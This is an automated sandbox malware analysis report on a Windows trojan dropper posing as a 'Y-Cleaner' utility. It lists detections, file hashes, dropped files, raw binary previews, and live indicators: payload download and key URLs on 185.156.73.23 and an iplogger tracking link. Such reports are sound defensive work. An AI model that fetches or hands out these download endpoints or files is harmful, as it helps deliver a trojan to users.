3K6rBUOQ2z.exe100%AviraHEUR/AGEN.1320706
3K6rBUOQ2z.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\wuBeweeRz\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
    high
    http://185.156.73.23/dll/downloadfalse
      high
      http://185.156.73.23/files/downloadfalse
        high
        http://185.156.73.23/dll/keyfalse
          high
          http://185.156.73.23/soft/downloadfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://185.156.73.23/dll/downloadp3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp83K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://g-cleanit.hk3K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                  high
                  http://185.156.73.23/dll/downloadX3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.156.73.23/dll/keyW3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://upx.sf.netAmcache.hve.9.drfalse
                        high
                        http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p11743K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                          high
                          http://185.156.73.23/soft/download23/files/downloadz3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://iplogger.org/1Pz8p73K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.156.73.23
                              unknownRussian Federation
                              48817RELDAS-NETRUfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1578960
                              Start date and time:2024-12-20 17:07:18 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 6s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:3K6rBUOQ2z.exe
                              renamed because original name is a hash value
                              Original Sample Name:cd064ed63eb478d56c93d52cfe887dc8.exe
                              Detection:MAL
                              Classification:mal100.evad.winEXE@2/15@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for sample files taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 172.202.163.200, 40.126.53.16
                              • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 3K6rBUOQ2z.exe
                              TimeTypeDescription
                              12:55:02API Interceptor2572852x Sleep call for process: 3K6rBUOQ2z.exe modified
                              12:56:50API Interceptor1x Sleep call for process: WerFault.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.156.73.23zSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              4kahanaK78.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23/soft/download
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              RELDAS-NETRUzSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              4kahanaK78.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                              • 185.156.73.23
                              beacon.exeGet hashmaliciousCobaltStrikeBrowse
                              • 185.156.73.37
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]zSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                                tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                                  hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                    7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                      dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                        8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                          BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.9873026440191326
                                                  Encrypted:false
                                                  SSDEEP:96:vJLLJhasIhNi7YjSYQXIDcQZc6mpcEwcw3TCm+HbHg/8BRTf3Oy1oVazW0H9nFEm:BLlcg0Xsaijud3szuiFwZ24IO8X
                                                  MD5:FF0AAAE2498AC6ABE56AFCD505A01773
                                                  SHA1:C41BF6DF6FA4937E9853DAD466D6CCD40E0B90BF
                                                  SHA-256:B6E38626F59A6D37FF75A34AF173DB8D6A3BABD449D0C6C8D4169BE5CF96F93B
                                                  SHA-512:FC2BFF27DEB58CC208E60EAC9BE17C26F311797BA7A2DF76DAF4A872AFAE061866396D4E65293F8BE5A7A47EB53F576B0B3105205995BF4AF29B22E44D0346A0
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.9.0.9.7.9.0.7.2.5.5.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.9.0.9.7.9.6.1.9.4.4.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.4.7.8.1.6.c.-.9.e.6.c.-.4.7.2.b.-.8.1.c.f.-.b.6.e.8.5.1.8.9.0.2.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.2.a.4.8.0.f.-.1.b.3.1.-.4.d.9.6.-.8.3.8.8.-.0.c.9.6.b.e.a.b.d.1.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.K.6.r.B.U.O.Q.2.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.c.-.0.0.0.1.-.0.0.1.4.-.7.0.9.5.-.6.5.6.1.f.9.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.1.6.b.2.2.f.e.6.a.e.5.0.5.1.0.0.5.8.0.6.f.f.8.7.8.d.1.1.a.7.0.0.0.0.f.f.f.f.!.0.0.0.0.9.d.6.2.f.6.8.8.f.6.8.f.c.d.6.e.2.6.d.d.3.0.5.1.8.2.a.a.a.0.6.b.3.4.7.c.a.c.1.9.!.3.K.6.r.B.U.O.Q.2.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 17:56:19 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):46690
                                                  Entropy (8bit):2.5440389890786994
                                                  Encrypted:false
                                                  SSDEEP:192:U/G8M0gXwgDvKXrRr+Oio+FN8fz5WdJFqasQVadpmLtn/O5Kbm1KNELOpmABcDI0:cbgDvQRr5P+F25WdJOQPn/0mcO/G5PH
                                                  MD5:B96C0BF11E197F01BDF96339276D248E
                                                  SHA1:B738AC3137D3E19941A55A28A7AC039D7B19CD26
                                                  SHA-256:5248E513E8266D016385C48F9713BD64010619BE01DC6194520F236176C3CA21
                                                  SHA-512:6CB09BC67FCB61CE3BA03FB688AE6F1FB7F1E169DED39DE4CD2FE3B7F088F2EACAC2F491C5B013A55E1FE5B29D5D1568868E62EB75661DB5C438C66F86B29856
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... ........eg............4...........8...<.......T....,..........T.......8...........T...........xB...s..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......l...q.eg....a........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8404
                                                  Entropy (8bit):3.696021737736292
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJsFw60K6YN8SU9zgmfytpD+89byzsfjGm:R6lXJZ6x6YGSU9zgmfyvyYfr
                                                  MD5:08383EF8F54BBCB1F77AA73FD1623E22
                                                  SHA1:AE0FFFAF6AF0EBD2AB7BE9517E0B4AB3AE6668AA
                                                  SHA-256:EBC385CD9AF84348F2F2C205DF62B659BB5888C9664D4185F1098F13583BC17B
                                                  SHA-512:6F1D5D1B570DE48A6F2024DFC78E6A4EA558F7C830F972086FB5CAF3DB20D07AFB6B3B352C14D0FB6D0BA0598CFAC33ACCC602EDB377A336396D65543CC2750C
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.0.4.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4680
                                                  Entropy (8bit):4.464101333722558
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsStJg77aI9AjWpW8VYdYm8M4JAQF6+q8vMIXGvCz9xd:uIjf4I7eS7VNJiKdXrz9xd
                                                  MD5:E88B2400D4347474FCD2FD6BAD591281
                                                  SHA1:8DCD642885A1D9BB403D2DB33934C3642650C6AE
                                                  SHA-256:F6EFDBBE0206326D86D9364127272F90B7C34AD31A649F3B905A8049F3566853
                                                  SHA-512:764FE996D6F34688851532AA547F10708D2A222BCCF6FD819AC36127AA4FABC3E46B65507FC9777626EBFF1029F4C9B8D9DC84C4979716771653B38927EE78A2
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):242176
                                                  Entropy (8bit):6.47050397947197
                                                  Encrypted:false
                                                  SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                  MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                  SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                  SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                  SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: zSmMqGGeVy.exe, Detection: malicious, Browse
                                                  • Filename: tXEKP1ThBP.exe, Detection: malicious, Browse
                                                  • Filename: hvm4oOzDaX.exe, Detection: malicious, Browse
                                                  • Filename: 7JKssbjRDa.exe, Detection: malicious, Browse
                                                  • Filename: dI3n4LSHB7.exe, Detection: malicious, Browse
                                                  • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                  • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  Reputation:high, very likely benign file
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:V:V
                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:0
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:V:V
                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                  Malicious:false
                                                  Preview:0
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:V:V
                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                  Malicious:false
                                                  Preview:0
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):97296
                                                  Entropy (8bit):7.9982317718947025
                                                  Encrypted:true
                                                  SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                  MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                  SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                  SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                  SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                  Malicious:false
                                                  Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):21
                                                  Entropy (8bit):3.880179922675737
                                                  Encrypted:false
                                                  SSDEEP:3:gFsR0GOWW:gyRhI
                                                  MD5:408E94319D97609B8E768415873D5A14
                                                  SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                  SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                  SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                  Malicious:false
                                                  Preview:9tKiK3bsYm4fMuK47Pk3s
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1502720
                                                  Entropy (8bit):7.646111739368707
                                                  Encrypted:false
                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):242176
                                                  Entropy (8bit):6.47050397947197
                                                  Encrypted:false
                                                  SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                  MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                  SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                  SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                  SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
